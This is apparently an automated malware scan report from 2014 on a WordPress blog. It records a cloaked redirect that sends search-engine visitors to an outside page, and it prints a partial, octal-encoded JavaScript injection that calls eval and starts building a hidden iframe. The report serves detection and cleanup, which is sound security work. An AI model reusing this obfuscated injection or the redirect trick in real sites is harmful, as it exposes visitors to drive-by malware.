Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.alexusstrong.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.alexusstrong.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 29 Aug 2014 12:45:19 GMT Location: http://habboigratis.altervista.org/ohmf.html?h=1453423 Server: Apache Vary: Accept-Encoding Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.alexusstrong.com/ | 200 OK Content-Length: 11321 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0150,0155,0164,0153,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162, Antivirus reports:
| ||
http://www.alexusstrong.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://www.alexusstrong.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://s.gravatar.com/js/gprofiles.js?aa&ver=3.9.2 | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://www.alexusstrong.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=3.9.2 | 200 OK Content-Length: 930 Content-Type: application/javascript | clean |
http://www.alexusstrong.com/wp-content/themes/fresh-and-clean/js/featured.js?ver=2012-01-10 | 200 OK Content-Length: 573 Content-Type: application/javascript | clean |
http://stats.wordpress.com/e-201435.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://www.alexusstrong.com/?p=1 | 200 OK Content-Length: 19300 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0150,0155,0164,0153,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145 ...[2097 bytes skipped]... Antivirus reports:
| ||
http://platform.linkedin.com/in.js | 200 OK Content-Length: 3690 Content-Type: text/javascript | clean |
http://www.alexusstrong.com/wp-content/plugins/jetpack/modules/sharedaddy/sharing.js?ver=0.1 | 200 OK Content-Length: 8877 Content-Type: application/javascript | clean |
http://apis.google.com/js/plusone.js | 200 OK Content-Length: 12387 Content-Type: application/javascript | clean |
http://www.alexusstrong.com/wp-includes/js/comment-reply.min.js?ver=3.9.2 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://www.alexusstrong.com/wp-content/uploads/2012/02/Alexus_blogborder_01a.png | 200 OK Content-Length: 241310 Content-Type: image/png | clean |
http://www.alexusstrong.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.alexusstrong.com/?p=1&share=facebook | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Aug 2014 12:45:34 GMT Location: http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.alexusstrong.com%2F%3Fp%3D1&t=Alexus+Strong+-+Can+I+Make+it+to+the+WNBA%3F%3F Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.alexusstrong.com/xmlrpc.php | clean |
http://www.facebook.com/sharer.php?u=http%3a%2f%2fwww.alexusstrong.com%2f%3fp%3d1&t=alexus+strong+-+can+i+make+it+to+the+wnba%3f%3f | HTTP/1.1 302 forced.302 Connection: close Date: Fri, 29 Aug 2014 12:45:36 GMT Location: https://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.alexusstrong.com%2F%3Fp%3D1&t=alexus+strong+-+can+i+make+it+to+the+wnba%3F%3F Content-Length: 0 Content-Type: text/html; charset=utf-8 X-FB-Debug: o8DOvHjj6Y58y1RhyBCYd4lXrcV9guK65/TXLq7W2em+LJPlA52cyTQtCgLXXfkaObYHr4LqUXixqgOhsQmU/w== | clean |
https://www.facebook.com/sharer.php?u=http%3a%2f%2fwww.alexusstrong.com%2f%3fp%3d1&t=alexus+strong+-+can+i+make+it+to+the+wnba%3f%3f | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Fri, 29 Aug 2014 12:45:36 GMT Pragma: no-cache Content-Type: text/html;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=8HUAVNpl4HPhl3AWYCJN-W7T; expires=Sun, 28-Aug-2016 12:45:36 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: 8tLhKZyp5JzLvj3sQ757H7WTY/QwvtqXwbxE1O0yh27OuRLBKPq3v6DP/dbGn4BIHB0YqPYRjnSN/ZgcmkNktA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 | clean |
https://www.facebook.com/sharer/sharer.php?u=http%3a%2f%2fwww.alexusstrong.com%2f%3fp%3d1&t=alexus+strong+-+can+i+make+it+to+the+wnba%3f%3f | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Fri, 29 Aug 2014 12:45:37 GMT Pragma: no-cache Content-Type: text/html;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=8XUAVKMannjYbRGgvLyxYt1J; expires=Sun, 28-Aug-2016 12:45:37 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: F+hoJNRFwF7YWW/43DjMoXyiaBNaT3KvQJ3CziOyejmMQ7Wc8KQuSZz1HSd82+UclzrLYUswsgzHT7ht+bep4Q== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login.php?next=https%3a%2f%2fwww.facebook.com%2fsharer%2fsharer.php%3fu%3dhttp%253a%252f%252fwww.alexusstrong.com%252f%253fp%253d1%26amp%253bt%3dalexus%2bstrong%2b-%2bcan%2bi%2bmake%2bit%2bto%2bthe%2bwnba%253f%253f&display=popup | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Fri, 29 Aug 2014 12:45:37 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=8XUAVDIqEgnXnm1w8thZNCew; expires=Sun, 28-Aug-2016 12:45:37 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fsharer%252Fsharer.php%253Fu%253Dhttp%25253a%25252f%25252fwww.alexusstrong.com%25252f%25253fp%25253d1%2526amp%25253bt%253Dalexus%252Bstrong%252B-%252Bcan%252Bi%252Bmake%252Bit%252Bto%252Bthe%252Bwnba%25253f%25253f%26amp%253Bdisplay%3Dpopup; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fsharer%252Fsharer.php%253Fu%253Dhttp%25253a%25252f%25252fwww.alexusstrong.com%25252f%25253fp%25253d1%2526amp%25253bt%253Dalexus%252Bstrong%252B-%252Bcan%252Bi%252Bmake%252Bit%252Bto%252Bthe%252Bwnba%25253f%25253f%26amp%253Bdisplay%3Dpopup; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: MQl2dYDl3DyPm/wwgqHMNNwqnocwEYluv2+62us3P7a+K1YQTn3zgstyNkKp7md/qu9G/TOgupqVg+mdArDlGA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login.php?next=https%3a%2f%2fwww.facebook.com%2fsharer%2fsharer.php%3fu%3dhttp%253a%252f%252fwww.alexusstrong.com%252f%253fp%253d1%26amp%253bt%3dalexus%2bstrong%2b-%2bcan%2bi%2bmake%2bit%2bto%2bthe%2bwnba%253f%253f&%3bdisplay=popup&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Fri, 29 Aug 2014 12:45:37 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=8XUAVIxL3On8XpuEIzyy_0Hw; expires=Sun, 28-Aug-2016 12:45:37 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fsharer%252Fsharer.php%253Fu%253Dhttp%25253a%25252f%25252fwww.alexusstrong.com%25252f%25253fp%25253d1%2526amp%25253bt%253Dalexus%252Bstrong%252B-%252Bcan%252Bi%252Bmake%252Bit%252Bto%252Bthe%252Bwnba%25253f%25253f%26amp%253Bamp%253Bdisplay%3Dpopup%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fsharer%252Fsharer.php%253Fu%253Dhttp%25253a%25252f%25252fwww.alexusstrong.com%25252f%25253fp%25253d1%2526amp%25253bt%253Dalexus%252Bstrong%252B-%252Bcan%252Bi%252Bmake%252Bit%252Bto%252Bthe%252Bwnba%25253f%25253f%26amp%253Bamp%253Bdisplay%3Dpopup%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: CFmQp6yohlLWQ+XprBZuHDbwiEkiUpy9RlOLGVdc8CejA43QL2TQQ4QlShAMBKzJdWXk4lKVYEs//vI3+8F3HA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.alexusstrong.com/?p=1&share=stumbleupon | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Aug 2014 12:45:38 GMT Location: http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.alexusstrong.com%2F%3Fp%3D1&title=Alexus+Strong+-+Can+I+Make+it+to+the+WNBA%3F%3F Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.alexusstrong.com/xmlrpc.php | clean |
http://www.stumbleupon.com/submit?url=http%3a%2f%2fwww.alexusstrong.com%2f%3fp%3d1&title=alexus+strong+-+can+i+make+it+to+the+wnba%3f%3f | HTTP/1.1 302 Redirect Connection: close Date: Fri, 29 Aug 2014 12:45:41 GMT Accept-Ranges: bytes Age: 0 Location: /submit/visitor Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=utf-8 P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: ssid=I.wxvSzSpdj1c9dTIXtHr9EcTLFNnELQ; path=/; domain=.stumbleupon.com Set-Cookie: cmf_i=204821039540075f4cb3e34.82362076; expires=Sun, 28-Sep-2014 12:45:41 GMT; path=/; domain=.stumbleupon.com Set-Cookie: cmf_spr=A%2FN; expires=Sun, 28-Sep-2014 12:45:41 GMT; path=/; domain=.stumbleupon.com Set-Cookie: cmf_sp=%2Fsubmit; expires=Sun, 28-Sep-2014 12:45:41 GMT; path=/; domain=.stumbleupon.com Set-Cookie: su_c=3abef25d9a07e750aaeaaa3a9ac5ef8f%7C%7C10%7C%7C1409316340%7C59c6d94ec5d592210e49dad408bb4ae9; expires=Sat, 29-Aug-2015 12:45:41 GMT; path=/; domain=.stumbleupon.com | clean |
http://www.stumbleupon.com/submit/visitor | 200 OK Content-Length: 24545 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alexusstrong.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alexusstrong.com/
Result: alexusstrong.com is not infected or malware details are not published yet.
Result: alexusstrong.com is not infected or malware details are not published yet.